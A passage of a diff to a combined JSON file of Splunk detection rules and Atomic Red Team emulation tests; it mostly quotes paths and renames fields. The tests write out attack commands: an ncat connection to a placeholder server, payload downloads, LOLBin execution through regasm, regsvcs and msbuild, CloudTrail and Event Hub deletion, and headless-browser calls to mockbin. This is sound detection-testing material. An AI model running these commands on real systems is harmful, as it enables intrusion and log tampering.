\"$parentpath\\nmap.zip\"\nInvoke-WebRequest \"https://nmap.org/dist/nmap-7.80-win32.zip\" -OutFile \"$zippath\"\n Expand-Archive $zippath $parentpath -Force\n $unzipPath = Join-Path $parentPath \"nmap-7.80\"\nif( $null -eq (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | ?{$_.DisplayName -like \"Microsoft Visual C++*\"}) ) {\n Start-Process (Join-Path $unzipPath \"vcredist_x86.exe\")\n}\n" + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory -Force -Path \"#{ncat_path}\" | Out-Null\n$parentpath = Split-Path (Split-Path \"#{ncat_exe}\"); $zippath = \"$parentpath\\nmap.zip\"\nInvoke-WebRequest \"https://nmap.org/dist/nmap-7.80-win32.zip\" -OutFile \"$zippath\"\n Expand-Archive $zippath $parentpath -Force\n $unzipPath = Join-Path $parentPath \"nmap-7.80\"\nif( $null -eq (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | ?{$_.DisplayName -like \"Microsoft Visual C++*\"}) ) {\n Start-Process (Join-Path $unzipPath \"vcredist_x86.exe\")\n}\n" } ], "executor": { - "command": "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "command": "cmd /c \"#{ncat_exe}\" #{server_ip} #{server_port}\n", "name": "powershell" } }, @@ -562451,7 +568165,8 @@ "name": "Windows Credentials from Password Stores Chrome LocalState Access", "analytic_story": [ "RedLine Stealer", - "Amadey" + "Amadey", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -562512,7 +568227,8 @@ "name": "Windows Credentials from Password Stores Chrome Login Data Access", "analytic_story": [ "RedLine Stealer", - "Amadey" + "Amadey", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -562649,7 +568365,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -562665,7 +568381,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -566242,7 +571958,7 @@ { "name": "Suspicious Kerberos Service Ticket Request", "description": "As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation.", - "search": " `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,\"@\"),0)+\"$\"),1,0) | where isSuspicious = 1 | table _time, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter`", + "search": " `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,\"@\"),0)+\"$\"),1,0) | where isSuspicious = 1 | rename ComputerName as dest| rename Account_Name as user | table _time, dest, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter`", "tags": { "name": "Suspicious Kerberos Service Ticket Request", "analytic_story": [ @@ -566259,7 +571975,7 @@ "Delivery", "Installation" ], - "message": "A suspicious Kerberos Service Ticket was requested by $Account_Name$", + "message": "A suspicious Kerberos Service Ticket was requested by $user$ on host $dest$", "mitre_attack_id": [ "T1078", "T1078.002" @@ -566269,7 +571985,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -566745,7 +572461,7 @@ } ], "command_list": [ - "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library \\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library \"\\T1218.009\\src\\T1218.009.cs\"\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"$Env:TEMP\\T1218.009.dll\" /target:library /keyfile:$env:Temp\\key.snk \\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe $Env:TEMP\\T1218.009.dll\n" ], "commands": [], @@ -566781,12 +572497,12 @@ "dependencies": [ { "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", - "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + "prereq_command": "if (Test-Path \"#{source_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{source_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" } ], "executor": { - "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library \"#{source_file}\"\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", "cleanup_command": "del #{output_file} >nul 2>&1\n", "name": "command_prompt" } @@ -566814,8 +572530,8 @@ "dependencies": [ { "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", - "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + "prereq_command": "if (Test-Path \"#{source_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{source_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" } ], "executor": { @@ -567166,7 +572882,7 @@ { "name": "Detect Regasm with no Command Line Arguments", "description": "The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe` and `C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe`.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regasm\\.exe.{0,4}$)\" | `detect_regasm_with_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regasm\\.exe.{0,4}$)\" | `detect_regasm_with_no_command_line_arguments_filter`", "tags": { "name": "Detect Regasm with no Command Line Arguments", "analytic_story": [ @@ -567399,7 +573115,7 @@ { "name": "Detect Regsvcs with No Command Line Arguments", "description": "The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regsvcs\\.exe.{0,4}$)\"| `detect_regsvcs_with_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regsvcs\\.exe.{0,4}$)\"| `detect_regsvcs_with_no_command_line_arguments_filter`", "tags": { "name": "Detect Regsvcs with No Command Line Arguments", "analytic_story": [ @@ -568478,7 +574194,7 @@ { "name": "Attempt To Add Certificate To Untrusted Store", "description": "The following analytic is designed to detect potential security threats involving the misuse of system trust. It works by detecting events where a process attempts to add a certificate to the untrusted certificate store, an action often associated with disabling security tools. The analytic uses Sysmon Event ID 1 data source, particularly focusing on process activities and command-line arguments related to 'certutil -addstore'. It's essential to ingest data that records process activity and logs containing process names and command lines for its effective operation. Be aware, sometimes administrators might legitimately perform this action. The analytic's value lies in detecting isolated or unexpected instances, indicative of potential malicious activities. Cybersecurity analysts should understand the importance of trust mechanisms and their subversion in system security.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`", "tags": { "name": "Attempt To Add Certificate To Untrusted Store", "analytic_story": [ @@ -570091,7 +575807,7 @@ ], "command_list": [ "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Windows\\Temp\\T1027.004.exe \\T1027.004\\src\\calc.cs\n", - "Invoke-Expression \\T1027.004\\bin\\T1027.004_DynamicCompile.exe\n", + "Invoke-Expression \"\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\"\n", "gcc /T1027.004/src/T1027-004-test.c && ./a.out\nclang /T1027.004/src/T1027-004-test.c && ./a.out\n", "g++ /T1027.004/src/T1027-004-test.cc && ./a.out\nclang++ /T1027.004/src/T1027-004-test.cc && ./a.out\n", "go run /T1027.004/src/T1027-004-test.go\n" @@ -570129,8 +575845,8 @@ "dependencies": [ { "description": "C# file must exist on disk at specified location (#{input_file})\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs\" -OutFile \"#{input_file}\"\n" + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{input_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs\" -OutFile \"#{input_file}\"\n" } ], "executor": { @@ -570157,12 +575873,12 @@ "dependencies": [ { "description": "exe file must exist on disk at specified location (#{input_file})\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file}\n" + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile \"#{input_file}\"\n" } ], "executor": { - "command": "Invoke-Expression #{input_file}\n", + "command": "Invoke-Expression \"#{input_file}\"\n", "name": "powershell" } }, @@ -570186,7 +575902,7 @@ { "description": "the source file must exist on disk at specified location (#{input_file})\n", "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", - "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -O #{input_file}\n" + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -O \"#{input_file}\"\n" } ], "executor": { @@ -573716,7 +579432,7 @@ { "name": "BITS Job Persistence", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*, *setcustomheaders*, *resume* ) by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bits_job_persistence_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*, *setcustomheaders*, *resume* ) by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bits_job_persistence_filter`", "tags": { "name": "BITS Job Persistence", "analytic_story": [ @@ -573792,14 +579508,15 @@ { "name": "BITSAdmin Download File", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (\"*transfer*\", \"*addfile*\") by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (\"*transfer*\", \"*addfile*\") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter`", "tags": { "name": "BITSAdmin Download File", "analytic_story": [ "Ingress Tool Transfer", "BITS Jobs", "DarkSide Ransomware", - "Living Off The Land" + "Living Off The Land", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -574134,8 +579851,8 @@ } ], "command_list": [ - "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\T1127.001\\src\\T1127.001.csproj\n", - "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\T1127.001\\src\\vb.xml\n" + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \"\\T1127.001\\src\\T1127.001.csproj\"\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \"\\T1127.001\\src\\vb.xml\"\n" ], "commands": [], "queries": [], @@ -574175,12 +579892,12 @@ "dependencies": [ { "description": "Project file must exist on disk at specified location (#{filename})\n", - "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj\" -OutFile \"#{filename}\"\n" + "prereq_command": "if (Test-Path \"#{filename}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{filename}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj\" -OutFile \"#{filename}\"\n" } ], "executor": { - "command": "#{msbuildpath}\\#{msbuildname} #{filename}\n", + "command": "#{msbuildpath}\\#{msbuildname} \"#{filename}\"\n", "name": "command_prompt" } }, @@ -574212,12 +579929,12 @@ "dependencies": [ { "description": "Project file must exist on disk at specified location (#{filename})\n", - "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml\" -OutFile \"#{filename}\"\n" + "prereq_command": "if (Test-Path \"#{filename}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{filename}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml\" -OutFile \"#{filename}\"\n" } ], "executor": { - "command": "#{msbuildpath}\\#{msbuildname} #{filename}\n", + "command": "#{msbuildpath}\\#{msbuildname} \"#{filename}\"\n", "name": "command_prompt" } } @@ -574439,7 +580156,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -574509,7 +580226,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -574715,7 +580432,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -576814,13 +582531,13 @@ }, { "description": "Check if the dependency resources are already present.\n", - "prereq_command": "if [ -f $PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate ]; then exit 0; else exit 1; fi;\n", - "get_prereq_command": "cd $PathToAtomicsFolder/T1562.008/src/T1562.008-1/\nterraform init\nterraform apply -auto-approve\n" + "prereq_command": "if [ -f \"$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "cd \"$PathToAtomicsFolder/T1562.008/src/T1562.008-1/\"\nterraform init\nterraform apply -auto-approve\n" } ], "executor": { "command": "aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", - "cleanup_command": "cd $PathToAtomicsFolder/T1562.008/src/T1562.008-1/\nterraform destroy -auto-approve\n", + "cleanup_command": "cd \"$PathToAtomicsFolder/T1562.008/src/T1562.008-1/\"\nterraform destroy -auto-approve\n", "name": "sh", "elevation_required": false } @@ -576878,15 +582595,15 @@ }, { "description": "Create dependency resources using terraform\n", - "prereq_command": "try {if (Test-Path $PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate ){ exit 0 } else {exit 1}} catch {exit 1}\n", - "get_prereq_command": "cd $PathToAtomicsFolder/T1562.008/src/T1562.008-2/\nterraform init\nterraform apply -auto-approve\n" + "prereq_command": "try {if (Test-Path \"$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate\" ){ exit 0 } else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "cd \"$PathToAtomicsFolder/T1562.008/src/T1562.008-2/\"\nterraform init\nterraform apply -auto-approve\n" } ], "executor": { "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}\n", "name": "powershell", "elevation_required": false, - "cleanup_command": "cd $PathToAtomicsFolder/T1562.008/src/T1562.008-2/\nterraform destroy -auto-approve\n" + "cleanup_command": "cd \"$PathToAtomicsFolder/T1562.008/src/T1562.008-2/\"\nterraform destroy -auto-approve\n" } }, { @@ -577184,7 +582901,7 @@ { "description": "Check if user is logged in \n", "prereq_command": "gcloud config get-value account\n", - "get_prereq_command": "gcloud auth login --no-launch-browser" + "get_prereq_command": "gcloud auth login --no-launch-browser\n" } ] } @@ -578602,7 +584319,8 @@ } ], "command_list": [ - "Start-Process powershell.exe -WindowStyle hidden calc.exe\n" + "Start-Process powershell.exe -WindowStyle hidden calc.exe\n", + "start \"\" chrome --headless --disable-gpu https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec\n" ], "commands": [], "queries": [], @@ -578632,6 +584350,31 @@ "command": "Start-Process #{powershell_command}\n", "name": "powershell" } + }, + { + "name": "Headless Browser Accessing Mockbin", + "auto_generated_guid": "0ad9ab92-c48c-4f08-9b20-9633277c4646", + "description": "The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.\nThe default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view.\nReference: https://cert.gov.ua/article/5702579\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "bin_id": { + "description": "Mockbin.org BIN ID", + "type": "string", + "default": "f6b9a876-a826-4ac0-83b8-639d6ad516ec" + }, + "browser": { + "description": "Browser to use (msedge, chrome, firefox)", + "type": "string", + "default": "chrome" + } + }, + "executor": { + "command": "start \"\" #{browser} --headless --disable-gpu https://mockbin.org/bin/#{bin_id}\n", + "cleanup_command": "taskkill /im #{browser} /f\n", + "name": "command_prompt" + } } ] } @@ -578968,6 +584711,144 @@ "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" ] + }, + { + "name": "Headless Browser Mockbin or Mocky Request", + "description": "The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of \"--headless\" and \"--disable-gpu\" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process=\"*--headless*\" AND Processes.process=\"*--disable-gpu*\" AND (Processes.process=\"*mockbin.org/*\" OR Processes.process=\"*mocky.io/*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `headless_browser_mockbin_or_mocky_request_filter`", + "tags": { + "name": "Headless Browser Mockbin or Mocky Request", + "analytic_story": [ + "Forest Blizzard" + ], + "asset_type": "endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Headless browser activity accessing mockbin.org or mocky.io detected on $dest$ by $user$.", + "mitre_attack_id": [ + "T1564.003" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 56, + "security_domain": "endpoint", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1564.003", + "mitre_attack_technique": "Hidden Window", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT3", + "APT32", + "CopyKittens", + "DarkHydrus", + "Deep Panda", + "Gamaredon Group", + "Gorgon Group", + "Higaisa", + "Kimsuky", + "Magic Hound", + "Nomadic Octopus" + ] + } + ] + } + }, + { + "name": "Headless Browser Usage", + "description": "The following hunting analytic is designed to detect the usage of headless browsers in an organization. Headless browsers are web browsers without a graphical user interface and are operated via a command line interface or network requests. They are often used for automating tasks but can also be utilized by adversaries for malicious activities such as web scraping, automated testing, and performing actions on web pages without detection. The detection is based on the presence of \"--headless\" and \"--disable-gpu\" command line arguments which are commonly used in headless browsing.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process=\"*--headless*\" AND Processes.process=\"*--disable-gpu*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `headless_browser_usage_filter`", + "tags": { + "name": "Headless Browser Usage", + "analytic_story": [ + "Forest Blizzard" + ], + "asset_type": "endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Behavior related to headless browser usage detected on $dest$ by $user$.", + "mitre_attack_id": [ + "T1564.003" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 15, + "security_domain": "endpoint", + "risk_severity": "low", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1564.003", + "mitre_attack_technique": "Hidden Window", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT3", + "APT32", + 